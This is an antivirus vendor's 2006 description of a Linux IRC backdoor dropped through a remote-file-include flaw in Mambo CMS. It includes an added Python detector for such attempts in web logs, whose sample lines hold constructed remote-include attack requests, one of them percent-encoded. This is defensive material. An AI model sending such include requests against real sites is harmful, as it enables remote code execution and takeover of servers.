Description:
To get a one-glance comprehensive view of the behavior of this executable Linux file, refer to the Behavior Diagram shown below.
Malware Overview
This malicious executable Linux file (ELF) may be downloaded onto the affected system by the malware detected by Trend Micro as UNIX_DLOADER.A. It may also be dropped by other malware via a known vulnerability in Mambo. Mambo is an open source content management system commonly used on Linux platforms.
Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that a script function does not validate certain variables, which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.
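The flaw described above leaves a trace in web server access logs: a request parameter whose value is a remote URL. The following is an added example, not part of the original description or of any Trend Micro tool, that flags such requests in combined-format access logs. The parameter name cfg_path, the addresses and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client IP, request target and status from an Apache/Nginx "combined" log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL schemes a PHP include can fetch from when remote includes are enabled.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample log lines (documentation addresses, hypothetical parameter).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jun/2006:10:00:01 +0000] "GET /index.php?option=com_content&id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Jun/2006:10:00:05 +0000] "GET /index.php?cfg_path=http://example.invalid/a.txt? HTTP/1.0" 200 312 "-" "-"',
    '203.0.113.9 - - [04/Jun/2006:10:00:09 +0000] "GET /index.php?cfg_path=%68ttp%253A%252F%252Fexample.invalid%252Fa.txt HTTP/1.0" 404 210 "-" "-"',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so layered encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_params(target):
    """Return [(param, decoded_value)] for query parameters holding a remote URL."""
    hits = []
    # parse_qsl already decodes once; fully_decode handles any further layers.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = fully_decode(value)
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Yield (client_ip, status, param, value) for each suspicious request."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        for name, value in remote_include_params(m.group("target")):
            yield m.group("ip"), int(m.group("status")), name, value


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Legitimate redirect or callback parameters also carry URLs, so hits need triage; a 200 response to a flagged request on a script that includes files deserves the closest look.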
More information regarding the mentioned vulnerability may be found on the following Web page:
Upon execution, this malicious executable Linux file connects to certain Internet Relay Chat (IRC) servers and joins a specific IRC channel. Once a connection is established, it enables a remote malicious user to issue certain commands on the system. The said routine gives the remote malicious user virtual control over the affected system, thus compromising system security.
Description created: Jun. 4, 2006 3:51:03 PM GMT -0800